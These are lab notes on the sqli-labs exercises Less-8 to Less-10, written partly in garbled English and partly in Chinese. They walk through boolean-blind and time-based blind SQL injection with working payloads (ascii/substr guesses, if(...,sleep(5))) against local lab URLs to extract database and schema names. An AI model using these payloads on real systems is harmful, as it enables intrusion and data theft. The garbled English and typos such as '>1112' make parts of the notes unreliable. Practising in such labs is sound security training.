select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);
Less-8
the first method
A single quote echo disappear
Added a note echoed resumed after the break indicating the presence injection vulnerability
Guess column
Kufa a guess
The first guess is s
http://192.168.50.100/sqli/Less-8/?id=1'
and left((select database()),1)=0x73--+
Guess Library Act II
Or use
http://192.168.50.100/sqli/Less-8/?id=1'
and ascii(substr((select database()),1,1)) > 16--+
The second method time blind
http://192.168.50.100/sqli/Less-8/?id=1' and
if(length(database()) = 8,1,sleep(5))--+
- When the 8-time load quickly, and for other worthy load time is slow (about 5s), it shows that the length of the database at this time is 8 (security)
When I guess when 18 pages have links with no echo
The first judging ascii code so
http://192.168.50.100/sqli/Less-8/
?id=1' and
if(ascii(substr((select database()),1,1)) =119, 1,sleep(5)) --+;
Error is no return value and slow load
Correct the return value and load faster
http://192.168.50.100/sqli/Less-8/?id=1' and
if(ascii(substr((select database()),1,1)) =115, 1,sleep(5)) --+;
Then the same way - time blinds, disassembled his table, column, field information
Less9
http://192.168.50.100/sqli/Less-9/?id=1' and sleep(5) --+
睡5秒 操作缓慢 且回显正确,说明存在注入漏洞
- 1. http://127.0.0.1/sqli/Less-9/?id=1‘ order by 3999--+ 当使用order by的时候,此时无论如何都是回显you are in….所以无法使用order by进行判断。
- 2. http://127.0.0.1/sqli/Less-9/?id=1‘ and sleep(5)--+ 当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠5s之后再返回结果。
- 3. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(length(database())=8,1,sleep(5)); 通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。
- 4. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+ 使用less-8中同样的方法进行判断即可!
- 5. 因为盲注属于猜解,推荐使用脚本进行操作。
Less10
- 1. http://192.168.50.100/sqli/Less-10/?id=1“ and sleep(11)--+ 只是将less-9中的单引号换成了双引号,其余的均相同。